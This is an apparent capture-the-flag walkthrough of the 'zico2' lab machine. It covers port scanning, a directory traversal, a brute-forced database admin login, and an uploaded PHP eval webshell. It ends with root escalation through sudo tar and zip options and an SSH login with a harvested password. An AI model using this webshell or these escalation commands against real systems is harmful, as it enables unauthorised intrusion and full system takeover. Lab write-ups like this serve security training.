zico2-1

Information gathering

arp-scan -l
nmap --min-rate 100000 -p- 192.168.240.135
nmap --min-rate 100000 -p80,22,111,54453 -A 192.168.240.135

dirsearch -u 192.168.240.135
dirb http://192.168.240.135/
nikto -host 192.168.240.135 -p 80

PORT STATE SERVICE VERSION
22/tcp open ssh OpenSSH 5.9p1 Debian 5ubuntu1.10 (Ubuntu Linux; protocol 2.0)
| ssh-hostkey:
| 1024 68:60:de:c2:2b:c6:16:d8:5b:88:be:e3:cc:a1:25:75 (DSA)
| 2048 50:db:75:ba:11:2f:43:c9:ab:14:40:6d:7f:a1:ee:e3 (RSA)
|_ 256 11:5d:55:29:8a:77:d8:08:b4:00:9b:a3:61:93:fe:e5 (ECDSA)
80/tcp open http Apache httpd 2.2.22 ((Ubuntu))
|_http-title: Zico's Shop
|_http-server-header: Apache/2.2.22 (Ubuntu)
111/tcp open rpcbind 2-4 (RPC #100000)
| rpcinfo:
| program version port/proto service
| 100000 2,3,4 111/tcp rpcbind
| 100000 2,3,4 111/udp rpcbind
| 100000 3,4 111/tcp6 rpcbind
| 100000 3,4 111/udp6 rpcbind
| 100024 1 40322/udp6 status
| 100024 1 48314/udp status
| 100024 1 50709/tcp6 status
|_ 100024 1 54453/tcp status
54453/tcp open status 1 (RPC #100024)
MAC Address: 00:0C:29:BC:84:19 (VMware)
Warning: OSScan results may be unreliable because we could not find at least 1 open and 1 closed port
Device type: general purpose
Running: Linux 2.6.X|3.X
OS CPE: cpe:/o:linux:linux_kernel:2.6 cpe:/o:linux:linux_kernel:3
OS details: Linux 2.6.32 - 3.5
Network Distance: 1 hop
Service Info: OS: Linux; CPE: cpe:/o:linux:linux_kernel

TRACEROUTE
HOP RTT ADDRESS
1 0.32 ms 192.168.240.135

OS and Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 13.28 seconds

Penetration testing

Go to port 80 and click around: http://192.168.240.135/view.php?page=tools.html
This page parameter has a directory traversal vulnerability, but at this point the absolute path is still unknown.
After a few tries, found http://192.168.240.135/view.php?page=../../../../../../var/www/tools.html
In a real engagement this could be reported as a medium-severity finding.

dirb found this directory: ---- Entering directory: http://192.168.240.135/dbadmin/ ---
http://192.168.240.135/dbadmin/test_db.php is a web front-end for SQLite; it has no CAPTCHA, so brute-forcing the login directly gives the password: admin
This database has a remote code execution vulnerability; roughly speaking, upload a reverse webshell and that is it.

<?php @eval($_POST["cmd"]);?>

After renaming it, it can be seen at http://192.168.240.135/dbadmin/
Connect to the webshell with AntSword (蚁剑): http://192.168.240.135/dbadmin/test.php
Use the plugin to hand the shell straight to msf

Privilege escalation

First look for config files; found an account and a username.
ssh zico@192.168.240.135 sWfCsfJSPV9H3AmQzw8 and just log in.
sudo -l shows that tar and zip can be run as root. Strange; who normally gives compression commands root privileges?

Privilege escalation via tar:
echo "/bin/bash" > shell.sh
sudo tar cf archive.tar * --checkpoint=1 --checkpoint-action=exec=sh shell.sh
Privilege escalation via zip:
touch 1.txt
sudo zip 1.zip 1.txt -T --unzip-command="sh -c /bin/bash"